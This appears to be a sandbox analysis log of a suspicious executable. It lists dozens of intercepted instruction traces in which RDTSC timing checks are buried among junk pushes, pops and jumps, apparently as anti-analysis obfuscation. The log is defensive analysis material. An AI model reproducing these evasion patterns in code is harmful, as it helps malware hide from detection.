Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC109A second address: 6EC10E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F2BDCD5A7ABh 0x00000014 pop ecx 0x00000015 pushfd 0x00000016 jmp 00007F2BDCD5A7B9h 0x0000001b jmp 00007F2BDCD5A7ABh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC10E2 second address: 6EC1175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2BDC8ABB21h 0x0000000f nop 0x00000010 jmp 00007F2BDC8ABB1Eh 0x00000015 lea eax, dword ptr [ebp-18h] 0x00000018 jmp 00007F2BDC8ABB20h 0x0000001d nop 0x0000001e pushad 0x0000001f mov bx, cx 0x00000022 pushfd 0x00000023 jmp 00007F2BDC8ABB1Ah 0x00000028 and cx, 8DE8h 0x0000002d jmp 00007F2BDC8ABB1Bh 0x00000032 popfd 0x00000033 popad 0x00000034 push eax 0x00000035 jmp 00007F2BDC8ABB29h 0x0000003a nop 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e mov ebx, eax 0x00000040 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1175 second address: 6EC1182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov ecx, 4FF14251h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC11A5 second address: 6EC11D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2BDC8ABB27h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC11D4 second address: 6EC124E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2BDCD5A7B3h 0x00000014 and eax, 30BA635Eh 0x0000001a jmp 00007F2BDCD5A7B9h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F2BDCD5A7B0h 0x00000026 and ecx, 30300F58h 0x0000002c jmp 00007F2BDCD5A7ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC124E second address: 6EC1305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F2C4CEC9F6Ch 0x00000011 pushad 0x00000012 call 00007F2BDC8ABB23h 0x00000017 jmp 00007F2BDC8ABB28h 0x0000001c pop ecx 0x0000001d mov cx, dx 0x00000020 popad 0x00000021 mov eax, dword ptr [ebp-14h] 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F2BDC8ABB23h 0x0000002b sub ecx, 57C198DEh 0x00000031 jmp 00007F2BDC8ABB29h 0x00000036 popfd 0x00000037 movzx eax, dx 0x0000003a popad 0x0000003b mov ecx, esi 0x0000003d jmp 00007F2BDC8ABB23h 0x00000042 mov dword ptr [esi+0Ch], eax 0x00000045 jmp 00007F2BDC8ABB26h 0x0000004a mov edx, 775606ECh 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1305 second address: 6EC1309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1309 second address: 6EC1326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1326 second address: 6EC13AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007F2BDCD5A7B8h 0x0000000c add cx, C7F8h 0x00000011 jmp 00007F2BDCD5A7ABh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub eax, eax 0x0000001c pushad 0x0000001d jmp 00007F2BDCD5A7B5h 0x00000022 mov ah, 90h 0x00000024 popad 0x00000025 lock cmpxchg dword ptr [edx], ecx 0x00000029 jmp 00007F2BDCD5A7B3h 0x0000002e pop edi 0x0000002f jmp 00007F2BDCD5A7B6h 0x00000034 test eax, eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13AA second address: 6EC13AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13AE second address: 6EC13B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13B2 second address: 6EC13B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13B8 second address: 6EC13BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13BE second address: 6EC13C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13C2 second address: 6EC13D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F2C4D378AB8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13D6 second address: 6EC13DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13DA second address: 6EC13E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13E0 second address: 6EC13F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13F1 second address: 6EC13F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC13F5 second address: 6EC1484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f jmp 00007F2BDC8ABB24h 0x00000014 popad 0x00000015 mov eax, dword ptr [esi] 0x00000017 jmp 00007F2BDC8ABB20h 0x0000001c mov dword ptr [edx], eax 0x0000001e jmp 00007F2BDC8ABB20h 0x00000023 mov eax, dword ptr [esi+04h] 0x00000026 jmp 00007F2BDC8ABB20h 0x0000002b mov dword ptr [edx+04h], eax 0x0000002e pushad 0x0000002f mov cl, 58h 0x00000031 mov ax, di 0x00000034 popad 0x00000035 mov eax, dword ptr [esi+08h] 0x00000038 jmp 00007F2BDC8ABB25h 0x0000003d mov dword ptr [edx+08h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F2BDC8ABB1Dh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1484 second address: 6EC1529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2BDCD5A7B7h 0x00000008 pushfd 0x00000009 jmp 00007F2BDCD5A7B8h 0x0000000e sbb ax, A488h 0x00000013 jmp 00007F2BDCD5A7ABh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esi+0Ch] 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F2BDCD5A7B4h 0x00000026 adc ax, 06E8h 0x0000002b jmp 00007F2BDCD5A7ABh 0x00000030 popfd 0x00000031 mov edi, ecx 0x00000033 popad 0x00000034 mov dword ptr [edx+0Ch], eax 0x00000037 jmp 00007F2BDCD5A7B2h 0x0000003c mov eax, dword ptr [esi+10h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F2BDCD5A7B7h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1529 second address: 6EC154A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 929Ah 0x00000007 jmp 00007F2BDC8ABB1Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+10h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ecx, edx 0x00000017 movsx edx, cx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC154A second address: 6EC1561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, cx 0x00000012 mov cx, 6D11h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1561 second address: 6EC1567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1567 second address: 6EC156B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC156B second address: 6EC156F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC156F second address: 6EC15F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b jmp 00007F2BDCD5A7B5h 0x00000010 mov eax, dword ptr [esi+18h] 0x00000013 jmp 00007F2BDCD5A7AEh 0x00000018 mov dword ptr [edx+18h], eax 0x0000001b jmp 00007F2BDCD5A7B0h 0x00000020 mov eax, dword ptr [esi+1Ch] 0x00000023 jmp 00007F2BDCD5A7B0h 0x00000028 mov dword ptr [edx+1Ch], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov bl, 11h 0x00000030 pushfd 0x00000031 jmp 00007F2BDCD5A7B6h 0x00000036 adc ecx, 47B0F788h 0x0000003c jmp 00007F2BDCD5A7ABh 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC15F8 second address: 6EC164E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 pushfd 0x00000013 jmp 00007F2BDC8ABB1Fh 0x00000018 and cx, C92Eh 0x0000001d jmp 00007F2BDC8ABB29h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC164E second address: 6EC1654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1654 second address: 6EC1658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1658 second address: 6EC165C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC165C second address: 6EC1696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F2BDC8ABB1Bh 0x00000014 adc esi, 760D9F3Eh 0x0000001a jmp 00007F2BDC8ABB29h 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1696 second address: 6EC16B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2BDCD5A7AEh 0x0000000b popad 0x0000000c mov eax, dword ptr [esi+24h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, 7A50h 0x00000016 movsx edi, ax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC16B9 second address: 6EC16F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDC8ABB21h 0x00000009 add cx, 0AD6h 0x0000000e jmp 00007F2BDC8ABB21h 0x00000013 popfd 0x00000014 mov ecx, 1F3AEE47h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx+24h], eax 0x0000001f pushad 0x00000020 mov cx, 5F3Fh 0x00000024 push eax 0x00000025 push edx 0x00000026 mov edi, ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC16F9 second address: 6EC1728 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2BDCD5A7AEh 0x00000008 or esi, 79689828h 0x0000000e jmp 00007F2BDCD5A7ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+28h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1728 second address: 6EC172C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC172C second address: 6EC1732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1732 second address: 6EC1738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1738 second address: 6EC173C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC173C second address: 6EC174D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC174D second address: 6EC1751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1751 second address: 6EC176E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC176E second address: 6EC17CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, dword ptr [esi+2Ch] 0x0000000d pushad 0x0000000e mov dh, B0h 0x00000010 call 00007F2BDCD5A7ACh 0x00000015 mov esi, 627B91E1h 0x0000001a pop esi 0x0000001b popad 0x0000001c mov dword ptr [edx+2Ch], ecx 0x0000001f jmp 00007F2BDCD5A7ADh 0x00000024 mov ax, word ptr [esi+30h] 0x00000028 jmp 00007F2BDCD5A7AEh 0x0000002d mov word ptr [edx+30h], ax 0x00000031 pushad 0x00000032 mov eax, 2933BBFDh 0x00000037 mov ecx, 5B051AF9h 0x0000003c popad 0x0000003d mov ax, word ptr [esi+32h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC17CD second address: 6EC17D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC17D1 second address: 6EC17D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC17D5 second address: 6EC17DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC17DB second address: 6EC1861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 mov ax, 9B49h 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+34h] 0x00000018 jmp 00007F2BDCD5A7B4h 0x0000001d mov dword ptr [edx+34h], eax 0x00000020 pushad 0x00000021 mov si, 002Dh 0x00000025 mov ax, 7229h 0x00000029 popad 0x0000002a test ecx, 00000700h 0x00000030 jmp 00007F2BDCD5A7B4h 0x00000035 jne 00007F2C4D37867Ch 0x0000003b jmp 00007F2BDCD5A7B0h 0x00000040 or dword ptr [edx+38h], FFFFFFFFh 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1861 second address: 6EC1867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1867 second address: 6EC186D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC186D second address: 6EC1871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1871 second address: 6EC1875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1875 second address: 6EC1895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c jmp 00007F2BDC8ABB1Ah 0x00000011 or dword ptr [edx+40h], FFFFFFFFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1895 second address: 6EC1899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1899 second address: 6EC189F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC189F second address: 6EC18F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDCD5A7B2h 0x00000009 or ecx, 101A7FE8h 0x0000000f jmp 00007F2BDCD5A7ABh 0x00000014 popfd 0x00000015 call 00007F2BDCD5A7B8h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2BDCD5A7ACh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC18F2 second address: 6EC1950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007F2BDC8ABB1Bh 0x00000012 xor ah, 0000003Eh 0x00000015 jmp 00007F2BDC8ABB29h 0x0000001a popfd 0x0000001b pop esi 0x0000001c mov ax, di 0x0000001f popad 0x00000020 leave 0x00000021 pushad 0x00000022 jmp 00007F2BDC8ABB29h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EB07D1 second address: 6EB07FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 call 00007F2BDCD5A7ABh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F2BDCD5A7AFh 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov cl, 2Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E5001B second address: 6E50081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 mov ecx, 415560FFh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov eax, 05C070F7h 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F2BDC8ABB23h 0x0000001c xor ecx, 1D09E57Eh 0x00000022 jmp 00007F2BDC8ABB29h 0x00000027 popfd 0x00000028 pop esi 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F2BDC8ABB1Eh 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 mov ax, C38Dh 0x00000036 push eax 0x00000037 push edx 0x00000038 movzx ecx, bx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50081 second address: 6E5009D instructions: 0x00000000 rdtsc 0x00000002 mov di, 07A8h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bx, 23C0h 0x00000010 movsx ebx, si 0x00000013 popad 0x00000014 pop ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov si, C133h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E507D3 second address: 6E50832 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 366Dh 0x00000007 mov cx, CC69h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F2BDC8ABB21h 0x00000018 adc ecx, 19349C76h 0x0000001e jmp 00007F2BDC8ABB21h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F2BDC8ABB20h 0x0000002a or cx, 6198h 0x0000002f jmp 00007F2BDC8ABB1Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50832 second address: 6E50890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d pushfd 0x0000000e jmp 00007F2BDCD5A7B3h 0x00000013 add ah, FFFFFFBEh 0x00000016 jmp 00007F2BDCD5A7B9h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bx, ED1Eh 0x00000025 push edi 0x00000026 pop ecx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50C9D second address: 6E50CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CA3 second address: 6E50CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CA7 second address: 6E50CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CC7 second address: 6E50CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CCB second address: 6E50CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
